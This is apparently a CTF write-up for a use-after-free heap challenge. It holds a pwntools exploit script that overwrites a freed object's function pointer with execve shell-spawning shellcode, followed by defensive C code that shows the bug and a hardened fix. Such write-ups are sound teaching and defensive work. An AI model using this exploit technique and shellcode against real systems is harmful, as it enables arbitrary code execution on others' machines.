cdor1's lab
H3X0R CTF ezheap
Notes: this was a UAF challenge, exploited by freeing a chunk, reallocating one of the same size, and overwriting the function pointer it held.
```python
from pwn import *

s = remote('localhost', 4000)

# The service prints an address after "0x"; keep it as the leak.
print(s.recvuntil(b'0x'))
leak = int(s.recvuntil(b'\n')[:-1], 16)
log.info('leak : ' + hex(leak))

# Menu choices as in the original script; per the writeup, this first
# sequence frees the object that holds the function pointer.
print(s.recvuntil(b'>>> '))
s.sendline(b'4')
print(s.recvuntil(b'Do You Want To Exit?'))
s.sendline(b'7')

# Per the writeup, a chunk of the same size is then allocated so it lands on
# the freed object: the payload's first 4 bytes overwrite the function
# pointer, and the remaining bytes are the shellcode from the original script.
print(s.recvuntil(b'>>> '))
s.sendline(b'3')
payload = p32(leak + 4)
payload += b'\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80'
s.sendline(payload)

# Last menu choice from the original script, then drop to an interactive shell.
print(s.recvuntil(b'>>> '))
s.sendline(b'1')
s.interactive()
```
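The bug class behind this challenge, as an added example in C (not code from the challenge binary or the author): a constructed `item_t` that keeps a function pointer on the heap, the vulnerable release/use pattern beside a hardened one that clears the only reference and refuses use after release, plus a check of whether a same-size allocation lands on the chunk just freed, which is what makes the overwrite in the writeup possible. The names `item_t`, `hard_use`, `hardened_sequence` and `same_size_chunk_reused` are assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
/* Constructed object in the shape the writeup describes: a heap chunk that
 * holds a function pointer next to user-controlled bytes. */
typedef struct { char note[28]; void (*show)(const char *); } item_t;
static int show_calls;
static void show_note(const char *n) { (void)n; show_calls++; }
static item_t *new_item(const char *text) {
    item_t *p = calloc(1, sizeof *p);
    if (p) { strncpy(p->note, text, sizeof p->note - 1); p->show = show_note; }
    return p;
}
/* Vulnerable pattern (CWE-416): release leaves the reference dangling and a
 * later use calls through freed memory. Not run by the test; -fsanitize=address flags it. */
item_t *vuln_item;
void vuln_release(void) { free(vuln_item); }
void vuln_use(void) { vuln_item->show(vuln_item->note); }

/* Hardened pattern: release clears the sole reference and every use checks
 * it before touching the object or calling through its function pointer. */
static void hard_release(item_t **ref) { if (*ref) { free(*ref); *ref = NULL; } }
static int hard_use(item_t **ref) {
    if (*ref == NULL) return -1;   /* freed or never allocated: refuse */
    (*ref)->show((*ref)->note);
    return 0;
}

/* Returns 1 when the live use runs once and the post-release use is refused. */
int hardened_sequence(void) {
    show_calls = 0;
    item_t *p = new_item("hello");
    if (!p) return -99;
    int before = hard_use(&p);     /* 0: object is live, callback runs */
    hard_release(&p);
    int after = hard_use(&p);      /* -1: reference cleared, nothing called */
    return (before == 0 && after == -1 && show_calls == 1) ? 1 : 0;
}

/* Why same-size reallocation matters: many allocators hand back the chunk
 * just freed (allocator-dependent, so the test only checks it is 0 or 1). */
int same_size_chunk_reused(void) {
    void *a = malloc(sizeof(item_t));
    uintptr_t old = (uintptr_t)a;
    free(a);
    void *b = malloc(sizeof(item_t));   /* same size class as the freed chunk */
    int reused = (uintptr_t)b == old;
    free(b);
    return reused;
}
```

Building the vulnerable path with `-fsanitize=address` and calling `vuln_release()` then `vuln_use()` reports a heap-use-after-free at the dereference, which is the cheapest way to catch this class before it ships.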